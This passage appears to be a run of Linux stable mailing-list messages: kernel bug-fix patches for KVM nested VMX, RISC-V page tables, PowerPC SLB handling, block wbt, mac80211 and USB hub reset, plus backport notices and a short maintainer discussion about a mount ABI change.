+++ b/arch/x86/kvm/vmx/vmx.c
@@ -2174,7 +2174,7 @@ static u64 nested_vmx_truncate_sysenter_addr(struct kvm_vcpu *vcpu,
return (unsigned long)data;
}
-static u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated)
+u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated)
{
u64 debugctl = 0;
@@ -2193,8 +2193,7 @@ static u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated
return debugctl;
}
-static bool vmx_is_valid_debugctl(struct kvm_vcpu *vcpu, u64 data,
- bool host_initiated)
+bool vmx_is_valid_debugctl(struct kvm_vcpu *vcpu, u64 data, bool host_initiated)
{
u64 invalid;
diff --git a/arch/x86/kvm/vmx/vmx.h b/arch/x86/kvm/vmx/vmx.h
index b5758c33c60f..392e66c7e5fe 100644
--- a/arch/x86/kvm/vmx/vmx.h
+++ b/arch/x86/kvm/vmx/vmx.h
@@ -414,6 +414,9 @@ static inline void vmx_set_intercept_for_msr(struct kvm_vcpu *vcpu, u32 msr,
void vmx_update_cpu_dirty_logging(struct kvm_vcpu *vcpu);
+u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated);
+bool vmx_is_valid_debugctl(struct kvm_vcpu *vcpu, u64 data, bool host_initiated);
+
/*
* Note, early Intel manuals have the write-low and read-high bitmap offsets
* the wrong way round. The bitmaps control MSRs 0x00000000-0x00001fff and
The patch below does not apply to the 6.15-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.15.y
git checkout FETCH_HEAD
git cherry-pick -x 095686e6fcb4150f0a55b1a25987fad3d8af58d6
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081222-nearness-monogram-75ab@gregkh' --subject-prefix 'PATCH 6.15.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 095686e6fcb4150f0a55b1a25987fad3d8af58d6 Mon Sep 17 00:00:00 2001
From: Maxim Levitsky <mlevitsk(a)redhat.com>
Date: Tue, 10 Jun 2025 16:20:08 -0700
Subject: [PATCH] KVM: nVMX: Check vmcs12->guest_ia32_debugctl on nested
VM-Enter
Add a consistency check for L2's guest_ia32_debugctl, as KVM only supports
a subset of hardware functionality, i.e. KVM can't rely on hardware to
detect illegal/unsupported values. Failure to check the vmcs12 value
would allow the guest to load any harware-supported value while running L2.
Take care to exempt BTF and LBR from the validity check in order to match
KVM's behavior for writes via WRMSR, but without clobbering vmcs12. Even
if VM_EXIT_SAVE_DEBUG_CONTROLS is set in vmcs12, L1 can reasonably expect
that vmcs12->guest_ia32_debugctl will not be modified if writes to the MSR
are being intercepted.
Arguably, KVM _should_ update vmcs12 if VM_EXIT_SAVE_DEBUG_CONTROLS is set
*and* writes to MSR_IA32_DEBUGCTLMSR are not being intercepted by L1, but
that would incur non-trivial complexity and wouldn't change the fact that
KVM's handling of DEBUGCTL is blatantly broken. I.e. the extra complexity
is not worth carrying.
Cc: stable(a)vger.kernel.org
Signed-off-by: Maxim Levitsky <mlevitsk(a)redhat.com>
Co-developed-by: Sean Christopherson <seanjc(a)google.com>
Link: https://lore.kernel.org/r/20250610232010.162191-7-seanjc@google.com
Signed-off-by: Sean Christopherson <seanjc(a)google.com>
diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
index 7211c71d4241..1b8b0642fc2d 100644
--- a/arch/x86/kvm/vmx/nested.c
+++ b/arch/x86/kvm/vmx/nested.c
@@ -2663,7 +2663,8 @@ static int prepare_vmcs02(struct kvm_vcpu *vcpu, struct vmcs12 *vmcs12,
if (vmx->nested.nested_run_pending &&
(vmcs12->vm_entry_controls & VM_ENTRY_LOAD_DEBUG_CONTROLS)) {
kvm_set_dr(vcpu, 7, vmcs12->guest_dr7);
- vmcs_write64(GUEST_IA32_DEBUGCTL, vmcs12->guest_ia32_debugctl);
+ vmcs_write64(GUEST_IA32_DEBUGCTL, vmcs12->guest_ia32_debugctl &
+ vmx_get_supported_debugctl(vcpu, false));
} else {
kvm_set_dr(vcpu, 7, vcpu->arch.dr7);
vmcs_write64(GUEST_IA32_DEBUGCTL, vmx->nested.pre_vmenter_debugctl);
@@ -3156,7 +3157,8 @@ static int nested_vmx_check_guest_state(struct kvm_vcpu *vcpu,
return -EINVAL;
if ((vmcs12->vm_entry_controls & VM_ENTRY_LOAD_DEBUG_CONTROLS) &&
- CC(!kvm_dr7_valid(vmcs12->guest_dr7)))
+ (CC(!kvm_dr7_valid(vmcs12->guest_dr7)) ||
+ CC(!vmx_is_valid_debugctl(vcpu, vmcs12->guest_ia32_debugctl, false))))
return -EINVAL;
if ((vmcs12->vm_entry_controls & VM_ENTRY_LOAD_IA32_PAT) &&
@@ -4608,6 +4610,12 @@ static void sync_vmcs02_to_vmcs12(struct kvm_vcpu *vcpu, struct vmcs12 *vmcs12)
(vmcs12->vm_entry_controls & ~VM_ENTRY_IA32E_MODE) |
(vm_entry_controls_get(to_vmx(vcpu)) & VM_ENTRY_IA32E_MODE);
+ /*
+ * Note! Save DR7, but intentionally don't grab DEBUGCTL from vmcs02.
+ * Writes to DEBUGCTL that aren't intercepted by L1 are immediately
+ * propagated to vmcs12 (see vmx_set_msr()), as the value loaded into
+ * vmcs02 doesn't strictly track vmcs12.
+ */
if (vmcs12->vm_exit_controls & VM_EXIT_SAVE_DEBUG_CONTROLS)
vmcs12->guest_dr7 = vcpu->arch.dr7;
diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
index 4f827a75d980..6a8b78e954cd 100644
--- a/arch/x86/kvm/vmx/vmx.c
+++ b/arch/x86/kvm/vmx/vmx.c
@@ -2174,7 +2174,7 @@ static u64 nested_vmx_truncate_sysenter_addr(struct kvm_vcpu *vcpu,
return (unsigned long)data;
}
-static u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated)
+u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated)
{
u64 debugctl = 0;
@@ -2193,8 +2193,7 @@ static u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated
return debugctl;
}
-static bool vmx_is_valid_debugctl(struct kvm_vcpu *vcpu, u64 data,
- bool host_initiated)
+bool vmx_is_valid_debugctl(struct kvm_vcpu *vcpu, u64 data, bool host_initiated)
{
u64 invalid;
diff --git a/arch/x86/kvm/vmx/vmx.h b/arch/x86/kvm/vmx/vmx.h
index b5758c33c60f..392e66c7e5fe 100644
--- a/arch/x86/kvm/vmx/vmx.h
+++ b/arch/x86/kvm/vmx/vmx.h
@@ -414,6 +414,9 @@ static inline void vmx_set_intercept_for_msr(struct kvm_vcpu *vcpu, u32 msr,
void vmx_update_cpu_dirty_logging(struct kvm_vcpu *vcpu);
+u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated);
+bool vmx_is_valid_debugctl(struct kvm_vcpu *vcpu, u64 data, bool host_initiated);
+
/*
* Note, early Intel manuals have the write-low and read-high bitmap offsets
* the wrong way round. The bitmaps control MSRs 0x00000000-0x00001fff and
Make sure we return the right pud value and not a value that could
have been overwritten in between by a different core.
Fixes: c3cc2a4a3a23 ("riscv: Add support for PUD THP")
Cc: stable(a)vger.kernel.org
Signed-off-by: Alexandre Ghiti <alexghiti(a)rivosinc.com>
---
Note that this will conflict with
https://lore.kernel.org/linux-riscv/20250625063753.77511-1-ajd@linux.ibm.co…
if applied after 6.17.
---
arch/riscv/include/asm/pgtable.h | 11 +++++++++++
1 file changed, 11 insertions(+)
diff --git a/arch/riscv/include/asm/pgtable.h b/arch/riscv/include/asm/pgtable.h
index 91697fbf1f9013005800f713797e4b6b1fc8d312..e69346307e78608dd98d8b7a77b7063c333448ee 100644
--- a/arch/riscv/include/asm/pgtable.h
+++ b/arch/riscv/include/asm/pgtable.h
@@ -942,6 +942,17 @@ static inline int pudp_test_and_clear_young(struct vm_area_struct *vma,
return ptep_test_and_clear_young(vma, address, (pte_t *)pudp);
}
+#define __HAVE_ARCH_PUDP_HUGE_GET_AND_CLEAR
+static inline pud_t pudp_huge_get_and_clear(struct mm_struct *mm,
+ unsigned long address, pud_t *pudp)
+{
+ pud_t pud = __pud(atomic_long_xchg((atomic_long_t *)pudp, 0));
+
+ page_table_check_pud_clear(mm, pud);
+
+ return pud;
+}
+
static inline int pud_young(pud_t pud)
{
return pte_young(pud_pte(pud));
---
base-commit: 62950c35a515743739e3d863eac25c20a5bd1613
change-id: 20250814-dev-alex-thp_pud_xchg-8153c313d946
Best regards,
--
Alexandre Ghiti <alexghiti(a)rivosinc.com>
On systems using the hash MMU, there is a software SLB preload cache that
mirrors the entries loaded into the hardware SLB buffer. This preload
cache is subject to periodic eviction — typically after every 256 context
switches — to remove old entry.
To optimize performance, the kernel skips switch_mmu_context() in
switch_mm_irqs_off() when the prev and next mm_struct are the same.
However, on hash MMU systems, this can lead to inconsistencies between
the hardware SLB and the software preload cache.
If an SLB entry for a process is evicted from the software cache on one
CPU, and the same process later runs on another CPU without executing
switch_mmu_context(), the hardware SLB may retain stale entries. If the
kernel then attempts to reload that entry, it can trigger an SLB
multi-hit error.
The following timeline shows how stale SLB entries are created and can
cause a multi-hit error when a process moves between CPUs without a
MMU context switch.
CPU 0 CPU 1
----- -----
Process P
exec swapper/1
load_elf_binary
begin_new_exc
activate_mm
switch_mm_irqs_off
switch_mmu_context
switch_slb
/*
* This invalidates all
* the entries in the HW
* and setup the new HW
* SLB entries as per the
* preload cache.
*/
context_switch
sched_migrate_task migrates process P to cpu-1
Process swapper/0 context switch (to process P)
(uses mm_struct of Process P) switch_mm_irqs_off()
switch_slb
load_slb++
/*
* load_slb becomes 0 here
* and we evict an entry from
* the preload cache with
* preload_age(). We still
* keep HW SLB and preload
* cache in sync, that is
* because all HW SLB entries
* anyways gets evicted in
* switch_slb during SLBIA.
* We then only add those
* entries back in HW SLB,
* which are currently
* present in preload_cache
* (after eviction).
*/
load_elf_binary continues...
setup_new_exec()
slb_setup_new_exec()
sched_switch event
sched_migrate_task migrates
process P to cpu-0
context_switch from swapper/0 to Process P
switch_mm_irqs_off()
/*
* Since both prev and next mm struct are same we don't call
* switch_mmu_context(). This will cause the HW SLB and SW preload
* cache to go out of sync in preload_new_slb_context. Because there
* was an SLB entry which was evicted from both HW and preload cache
* on cpu-1. Now later in preload_new_slb_context(), when we will try
* to add the same preload entry again, we will add this to the SW
* preload cache and then will add it to the HW SLB. Since on cpu-0
* this entry was never invalidated, hence adding this entry to the HW
* SLB will cause a SLB multi-hit error.
*/
load_elf_binary continues...
START_THREAD
start_thread
preload_new_slb_context
/*
* This tries to add a new EA to preload cache which was earlier
* evicted from both cpu-1 HW SLB and preload cache. This caused the
* HW SLB of cpu-0 to go out of sync with the SW preload cache. The
* reason for this was, that when we context switched back on CPU-0,
* we should have ideally called switch_mmu_context() which will
* bring the HW SLB entries on CPU-0 in sync with SW preload cache
* entries by setting up the mmu context properly. But we didn't do
* that since the prev mm_struct running on cpu-0 was same as the
* next mm_struct (which is true for swapper / kernel threads). So
* now when we try to add this new entry into the HW SLB of cpu-0,
* we hit a SLB multi-hit error.
*/
WARNING: CPU: 0 PID: 1810970 at arch/powerpc/mm/book3s64/slb.c:62
assert_slb_presence+0x2c/0x50(48 results) 02:47:29 [20157/42149]
Modules linked in:
CPU: 0 UID: 0 PID: 1810970 Comm: dd Not tainted 6.16.0-rc3-dirty #12
VOLUNTARY
Hardware name: IBM pSeries (emulated by qemu) POWER8 (architected)
0x4d0200 0xf000004 of:SLOF,HEAD hv:linux,kvm pSeries
NIP: c00000000015426c LR: c0000000001543b4 CTR: 0000000000000000
REGS: c0000000497c77e0 TRAP: 0700 Not tainted (6.16.0-rc3-dirty)
MSR: 8000000002823033 <SF,VEC,VSX,FP,ME,IR,DR,RI,LE> CR: 28888482 XER: 00000000
CFAR: c0000000001543b0 IRQMASK: 3
<...>
NIP [c00000000015426c] assert_slb_presence+0x2c/0x50
LR [c0000000001543b4] slb_insert_entry+0x124/0x390
Call Trace:
0x7fffceb5ffff (unreliable)
preload_new_slb_context+0x100/0x1a0
start_thread+0x26c/0x420
load_elf_binary+0x1b04/0x1c40
bprm_execve+0x358/0x680
do_execveat_common+0x1f8/0x240
sys_execve+0x58/0x70
system_call_exception+0x114/0x300
system_call_common+0x160/0x2c4
From the above analysis, during early exec the hardware SLB is cleared,
and entries from the software preload cache are reloaded into hardware
by switch_slb. However, preload_new_slb_context and slb_setup_new_exec
also attempt to load some of the same entries, which can trigger a
multi-hit. In most cases, these additional preloads simply hit existing
entries and add nothing new. Removing these functions avoids redundant
preloads and eliminates the multi-hit issue. This patch removes these
two functions.
We tested process switching performance using the context_switch
benchmark on POWER9/hash, and observed no regression.
Without this patch: 129041 ops/sec
With this patch: 129341 ops/sec
We also measured SLB faults during boot, and the counts are essentially
the same with and without this patch.
SLB faults without this patch: 19727
SLB faults with this patch: 19786
Fixes: 5434ae74629a ("powerpc/64s/hash: Add a SLB preload cache")
cc: stable(a)vger.kernel.org
Suggested-by: Nicholas Piggin <npiggin(a)gmail.com>
Signed-off-by: Donet Tom <donettom(a)linux.ibm.com>
---
arch/powerpc/include/asm/book3s/64/mmu-hash.h | 1 -
arch/powerpc/kernel/process.c | 5 --
arch/powerpc/mm/book3s64/internal.h | 2 -
arch/powerpc/mm/book3s64/mmu_context.c | 2 -
arch/powerpc/mm/book3s64/slb.c | 88 -------------------
5 files changed, 98 deletions(-)
diff --git a/arch/powerpc/include/asm/book3s/64/mmu-hash.h b/arch/powerpc/include/asm/book3s/64/mmu-hash.h
index 1c4eebbc69c9..e1f77e2eead4 100644
--- a/arch/powerpc/include/asm/book3s/64/mmu-hash.h
+++ b/arch/powerpc/include/asm/book3s/64/mmu-hash.h
@@ -524,7 +524,6 @@ void slb_save_contents(struct slb_entry *slb_ptr);
void slb_dump_contents(struct slb_entry *slb_ptr);
extern void slb_vmalloc_update(void);
-void preload_new_slb_context(unsigned long start, unsigned long sp);
#ifdef CONFIG_PPC_64S_HASH_MMU
void slb_set_size(u16 size);
diff --git a/arch/powerpc/kernel/process.c b/arch/powerpc/kernel/process.c
index 855e09886503..2b9799157eb4 100644
--- a/arch/powerpc/kernel/process.c
+++ b/arch/powerpc/kernel/process.c
@@ -1897,8 +1897,6 @@ int copy_thread(struct task_struct *p, const struct kernel_clone_args *args)
return 0;
}
-void preload_new_slb_context(unsigned long start, unsigned long sp);
-
/*
* Set up a thread for executing a new program
*/
@@ -1906,9 +1904,6 @@ void start_thread(struct pt_regs *regs, unsigned long start, unsigned long sp)
{
#ifdef CONFIG_PPC64
unsigned long load_addr = regs->gpr[2]; /* saved by ELF_PLAT_INIT */
-
- if (IS_ENABLED(CONFIG_PPC_BOOK3S_64) && !radix_enabled())
- preload_new_slb_context(start, sp);
#endif
#ifdef CONFIG_PPC_TRANSACTIONAL_MEM
diff --git a/arch/powerpc/mm/book3s64/internal.h b/arch/powerpc/mm/book3s64/internal.h
index a57a25f06a21..c26a6f0c90fc 100644
--- a/arch/powerpc/mm/book3s64/internal.h
+++ b/arch/powerpc/mm/book3s64/internal.h
@@ -24,8 +24,6 @@ static inline bool stress_hpt(void)
void hpt_do_stress(unsigned long ea, unsigned long hpte_group);
-void slb_setup_new_exec(void);
-
void exit_lazy_flush_tlb(struct mm_struct *mm, bool always_flush);
#endif /* ARCH_POWERPC_MM_BOOK3S64_INTERNAL_H */
diff --git a/arch/powerpc/mm/book3s64/mmu_context.c b/arch/powerpc/mm/book3s64/mmu_context.c
index 4e1e45420bd4..fb9dcf9ca599 100644
--- a/arch/powerpc/mm/book3s64/mmu_context.c
+++ b/arch/powerpc/mm/book3s64/mmu_context.c
@@ -150,8 +150,6 @@ static int hash__init_new_context(struct mm_struct *mm)
void hash__setup_new_exec(void)
{
slice_setup_new_exec();
-
- slb_setup_new_exec();
}
#else
static inline int hash__init_new_context(struct mm_struct *mm)
diff --git a/arch/powerpc/mm/book3s64/slb.c b/arch/powerpc/mm/book3s64/slb.c
index 6b783552403c..7e053c561a09 100644
--- a/arch/powerpc/mm/book3s64/slb.c
+++ b/arch/powerpc/mm/book3s64/slb.c
@@ -328,94 +328,6 @@ static void preload_age(struct thread_info *ti)
ti->slb_preload_tail = (ti->slb_preload_tail + 1) % SLB_PRELOAD_NR;
}
-void slb_setup_new_exec(void)
-{
- struct thread_info *ti = current_thread_info();
- struct mm_struct *mm = current->mm;
- unsigned long exec = 0x10000000;
-
- WARN_ON(irqs_disabled());
-
- /*
- * preload cache can only be used to determine whether a SLB
- * entry exists if it does not start to overflow.
- */
- if (ti->slb_preload_nr + 2 > SLB_PRELOAD_NR)
- return;
-
- hard_irq_disable();
-
- /*
- * We have no good place to clear the slb preload cache on exec,
- * flush_thread is about the earliest arch hook but that happens
- * after we switch to the mm and have already preloaded the SLBEs.
- *
- * For the most part that's probably okay to use entries from the
- * previous exec, they will age out if unused. It may turn out to
- * be an advantage to clear the cache before switching to it,
- * however.
- */
-
- /*
- * preload some userspace segments into the SLB.
- * Almost all 32 and 64bit PowerPC executables are linked at
- * 0x10000000 so it makes sense to preload this segment.
- */
- if (!is_kernel_addr(exec)) {
- if (preload_add(ti, exec))
- slb_allocate_user(mm, exec);
- }
-
- /* Libraries and mmaps. */
- if (!is_kernel_addr(mm->mmap_base)) {
- if (preload_add(ti, mm->mmap_base))
- slb_allocate_user(mm, mm->mmap_base);
- }
-
- /* see switch_slb */
- asm volatile("isync" : : : "memory");
-
- local_irq_enable();
-}
-
-void preload_new_slb_context(unsigned long start, unsigned long sp)
-{
- struct thread_info *ti = current_thread_info();
- struct mm_struct *mm = current->mm;
- unsigned long heap = mm->start_brk;
-
- WARN_ON(irqs_disabled());
-
- /* see above */
- if (ti->slb_preload_nr + 3 > SLB_PRELOAD_NR)
- return;
-
- hard_irq_disable();
-
- /* Userspace entry address. */
- if (!is_kernel_addr(start)) {
- if (preload_add(ti, start))
- slb_allocate_user(mm, start);
- }
-
- /* Top of stack, grows down. */
- if (!is_kernel_addr(sp)) {
- if (preload_add(ti, sp))
- slb_allocate_user(mm, sp);
- }
-
- /* Bottom of heap, grows up. */
- if (heap && !is_kernel_addr(heap)) {
- if (preload_add(ti, heap))
- slb_allocate_user(mm, heap);
- }
-
- /* see switch_slb */
- asm volatile("isync" : : : "memory");
-
- local_irq_enable();
-}
-
static void slb_cache_slbie_kernel(unsigned int index)
{
unsigned long slbie_data = get_paca()->slb_cache[index];
--
2.47.3
The commit 245618f8e45f ("block: protect wbt_lat_usec using
q->elevator_lock") protected wbt_enable_default() with
q->elevator_lock; however, it also placed wbt_enable_default()
before blk_queue_flag_set(QUEUE_FLAG_REGISTERED, q);, resulting
in wbt failing to be enabled.
Moreover, the protection of wbt_enable_default() by q->elevator_lock
was removed in commit 78c271344b6f ("block: move wbt_enable_default()
out of queue freezing from sched ->exit()"), so we can directly fix
this issue by placing wbt_enable_default() after
blk_queue_flag_set(QUEUE_FLAG_REGISTERED, q);.
Additionally, this issue also causes the inability to read the
wbt_lat_usec file, and the scenario is as follows:
root@q:/sys/block/sda/queue# cat wbt_lat_usec
cat: wbt_lat_usec: Invalid argument
root@q:/data00/sjc/linux# ls /sys/kernel/debug/block/sda/rqos
cannot access '/sys/kernel/debug/block/sda/rqos': No such file or directory
root@q:/data00/sjc/linux# find /sys -name wbt
/sys/kernel/debug/tracing/events/wbt
After testing with this patch, wbt can be enabled normally.
Signed-off-by: Julian Sun <sunjunchao(a)bytedance.com>
Cc: stable(a)vger.kernel.org
Fixes: 245618f8e45f ("block: protect wbt_lat_usec using q->elevator_lock")
---
Changed in v2:
- Improved commit message and comment
- Added Fixes and Cc stable
block/blk-sysfs.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/block/blk-sysfs.c b/block/blk-sysfs.c
index 396cded255ea..979f01bbca01 100644
--- a/block/blk-sysfs.c
+++ b/block/blk-sysfs.c
@@ -903,9 +903,9 @@ int blk_register_queue(struct gendisk *disk)
if (queue_is_mq(q))
elevator_set_default(q);
- wbt_enable_default(disk);
blk_queue_flag_set(QUEUE_FLAG_REGISTERED, q);
+ wbt_enable_default(disk);
/* Now everything is ready and send out KOBJ_ADD uevent */
kobject_uevent(&disk->queue_kobj, KOBJ_ADD);
--
2.39.5
On Thu, Jul 24, 2025 at 4:00 PM Al Viro <viro(a)zeniv.linux.org.uk> wrote:
>
> On Thu, Jul 24, 2025 at 01:02:48PM -0700, Andrei Vagin wrote:
> > Hi Al and Christian,
> >
> > The commit 12f147ddd6de ("do_change_type(): refuse to operate on
> > unmounted/not ours mounts") introduced an ABI backward compatibility
> > break. CRIU depends on the previous behavior, and users are now
> > reporting criu restore failures following the kernel update. This change
> > has been propagated to stable kernels. Is this check strictly required?
>
> Yes.
>
> > Would it be possible to check only if the current process has
> > CAP_SYS_ADMIN within the mount user namespace?
>
> Not enough, both in terms of permissions *and* in terms of "thou
> shalt not bugger the kernel data structures - nobody's priveleged
> enough for that".
Al,
I am still thinking in terms of "Thou shalt not break userspace"...
Seriously though, this original behavior has been in the kernel for 20
years, and it hasn't triggered any corruptions in all that time. I
understand this change might be necessary in its current form, and
that some collateral damage could be unavoidable. But if that's the
case, I'd expect a detailed explanation of why it had to be so and why
userspace breakage is unavoidable.
The original change was merged two decades ago. We need to
consider that some applications might rely on that behavior. I'm not
questioning the security aspect - that must be addressed. But for
anything else, we need to minimize the impact on user applications that
don't violate security.
We can consider a cleaner fix for the upstream kernel, but when we are
talking about stable kernels, the user-space backward compatibility
aspect should be even more critical.
Thanks,
Andrei
From: Mikhail Lobanov <m.lobanov(a)rosa.ru>
[ Upstream commit 16ee3ea8faef8ff042acc15867a6c458c573de61 ]
When userspace sets supported rates for a new station via
NL80211_CMD_NEW_STATION, it might send a list that's empty
or contains only invalid values. Currently, we process these
values in sta_link_apply_parameters() without checking the result of
ieee80211_parse_bitrates(), which can lead to an empty rates bitmap.
A similar issue was addressed for NL80211_CMD_SET_BSS in commit
ce04abc3fcc6 ("wifi: mac80211: check basic rates validity").
This patch applies the same approach in sta_link_apply_parameters()
for NL80211_CMD_NEW_STATION, ensuring there is at least one valid
rate by inspecting the result of ieee80211_parse_bitrates().
Found by Linux Verification Center (linuxtesting.org) with Syzkaller.
Fixes: b95eb7f0eee4 ("wifi: cfg80211/mac80211: separate link params from station params")
Signed-off-by: Mikhail Lobanov <m.lobanov(a)rosa.ru>
Link: https://patch.msgid.link/20250317103139.17625-1-m.lobanov@rosa.ru
Signed-off-by: Johannes Berg <johannes.berg(a)intel.com>
(cherry picked from commit 16ee3ea8faef8ff042acc15867a6c458c573de61)
Signed-off-by: Hanne-Lotta Mäenpää <hannelotta(a)gmail.com>
---
net/mac80211/cfg.c | 12 ++++++------
1 file changed, 6 insertions(+), 6 deletions(-)
diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
index cf2b8a05c338..9da17d653238 100644
--- a/net/mac80211/cfg.c
+++ b/net/mac80211/cfg.c
@@ -1879,12 +1879,12 @@ static int sta_link_apply_parameters(struct ieee80211_local *local,
}
if (params->supported_rates &&
- params->supported_rates_len) {
- ieee80211_parse_bitrates(link->conf->chanreq.oper.width,
- sband, params->supported_rates,
- params->supported_rates_len,
- &link_sta->pub->supp_rates[sband->band]);
- }
+ params->supported_rates_len &&
+ !ieee80211_parse_bitrates(link->conf->chanreq.oper.width,
+ sband, params->supported_rates,
+ params->supported_rates_len,
+ &link_sta->pub->supp_rates[sband->band]))
+ return -EINVAL;
if (params->ht_capa)
ieee80211_ht_cap_ie_to_sta_ht_cap(sdata, sband,
--
2.50.0
Hub driver warm-resets ports in SS.Inactive or Compliance mode to
recover a possible connected device. The port reset code correctly
detects if a connection is lost during reset, but hub driver
port_event() fails to take this into account in some cases.
port_event() ends up using stale values and assumes there is a
connected device, and will try all means to recover it, including
power-cycling the port.
Details:
This case was triggered when xHC host was suspended with DbC (Debug
Capability) enabled and connected. DbC turns one xHC port into a simple
usb debug device, allowing debugging a system with an A-to-A USB debug
cable.
xhci DbC code disables DbC when xHC is system suspended to D3, and
enables it back during resume.
We essentially end up with two hosts connected to each other during
suspend, and, for a short while during resume, until DbC is enabled back.
The suspended xHC host notices some activity on the roothub port, but
can't train the link due to being suspended, so xHC hardware sets a CAS
(Cold Attach Status) flag for this port to inform xhci host driver that
the port needs to be warm reset once xHC resumes.
CAS is xHCI specific, and not part of USB specification, so xhci driver
tells usb core that the port has a connection and link is in compliance
mode. Recovery from complinace mode is similar to CAS recovery.
xhci CAS driver support that fakes a compliance mode connection was added
in commit 8bea2bd37df0 ("usb: Add support for root hub port status CAS")
Once xHCI resumes and DbC is enabled back, all activity on the xHC
roothub host side port disappears. The hub driver will anyway think
port has a connection and link is in compliance mode, and hub driver
will try to recover it.
The port power-cycle during recovery seems to cause issues to the active
DbC connection.
Fix this by clearing connect_change flag if hub_port_reset() returns
-ENOTCONN, thus avoiding the whole unnecessary port recovery and
initialization attempt.
Cc: stable(a)vger.kernel.org
Fixes: 8bea2bd37df0 ("usb: Add support for root hub port status CAS")
Tested-by: Łukasz Bartosik <ukaszb(a)chromium.org>
Signed-off-by: Mathias Nyman <mathias.nyman(a)linux.intel.com>
---
drivers/usb/core/hub.c | 8 ++++++--
1 file changed, 6 insertions(+), 2 deletions(-)
diff --git a/drivers/usb/core/hub.c b/drivers/usb/core/hub.c
index 6bb6e92cb0a4..f981e365be36 100644
--- a/drivers/usb/core/hub.c
+++ b/drivers/usb/core/hub.c
@@ -5754,6 +5754,7 @@ static void port_event(struct usb_hub *hub, int port1)
struct usb_device *hdev = hub->hdev;
u16 portstatus, portchange;
int i = 0;
+ int err;
connect_change = test_bit(port1, hub->change_bits);
clear_bit(port1, hub->event_bits);
@@ -5850,8 +5851,11 @@ static void port_event(struct usb_hub *hub, int port1)
} else if (!udev || !(portstatus & USB_PORT_STAT_CONNECTION)
|| udev->state == USB_STATE_NOTATTACHED) {
dev_dbg(&port_dev->dev, "do warm reset, port only\n");
- if (hub_port_reset(hub, port1, NULL,
- HUB_BH_RESET_TIME, true) < 0)
+ err = hub_port_reset(hub, port1, NULL,
+ HUB_BH_RESET_TIME, true);
+ if (!udev && err == -ENOTCONN)
+ connect_change = 0;
+ else if (err < 0)
hub_port_disable(hub, port1, 1);
} else {
dev_dbg(&port_dev->dev, "do warm reset, full device\n");
--
2.43.0
The patch below does not apply to the 6.16-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.16.y
git checkout FETCH_HEAD
git cherry-pick -x 095686e6fcb4150f0a55b1a25987fad3d8af58d6
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081221-finicky-ensure-b830@gregkh' --subject-prefix 'PATCH 6.16.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 095686e6fcb4150f0a55b1a25987fad3d8af58d6 Mon Sep 17 00:00:00 2001
From: Maxim Levitsky <mlevitsk(a)redhat.com>
Date: Tue, 10 Jun 2025 16:20:08 -0700
Subject: [PATCH] KVM: nVMX: Check vmcs12->guest_ia32_debugctl on nested
VM-Enter
Add a consistency check for L2's guest_ia32_debugctl, as KVM only supports
a subset of hardware functionality, i.e. KVM can't rely on hardware to
detect illegal/unsupported values. Failure to check the vmcs12 value
would allow the guest to load any harware-supported value while running L2.
Take care to exempt BTF and LBR from the validity check in order to match
KVM's behavior for writes via WRMSR, but without clobbering vmcs12. Even
if VM_EXIT_SAVE_DEBUG_CONTROLS is set in vmcs12, L1 can reasonably expect
that vmcs12->guest_ia32_debugctl will not be modified if writes to the MSR
are being intercepted.
Arguably, KVM _should_ update vmcs12 if VM_EXIT_SAVE_DEBUG_CONTROLS is set
*and* writes to MSR_IA32_DEBUGCTLMSR are not being intercepted by L1, but
that would incur non-trivial complexity and wouldn't change the fact that
KVM's handling of DEBUGCTL is blatantly broken. I.e. the extra complexity
is not worth carrying.
Cc: stable(a)vger.kernel.org
Signed-off-by: Maxim Levitsky <mlevitsk(a)redhat.com>
Co-developed-by: Sean Christopherson <seanjc(a)google.com>
Link: https://lore.kernel.org/r/20250610232010.162191-7-seanjc@google.com
Signed-off-by: Sean Christopherson <seanjc(a)google.com>
diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
index 7211c71d4241..1b8b0642fc2d 100644
--- a/arch/x86/kvm/vmx/nested.c
+++ b/arch/x86/kvm/vmx/nested.c
@@ -2663,7 +2663,8 @@ static int prepare_vmcs02(struct kvm_vcpu *vcpu, struct vmcs12 *vmcs12,
if (vmx->nested.nested_run_pending &&
(vmcs12->vm_entry_controls & VM_ENTRY_LOAD_DEBUG_CONTROLS)) {
kvm_set_dr(vcpu, 7, vmcs12->guest_dr7);
- vmcs_write64(GUEST_IA32_DEBUGCTL, vmcs12->guest_ia32_debugctl);
+ vmcs_write64(GUEST_IA32_DEBUGCTL, vmcs12->guest_ia32_debugctl &
+ vmx_get_supported_debugctl(vcpu, false));
} else {
kvm_set_dr(vcpu, 7, vcpu->arch.dr7);
vmcs_write64(GUEST_IA32_DEBUGCTL, vmx->nested.pre_vmenter_debugctl);
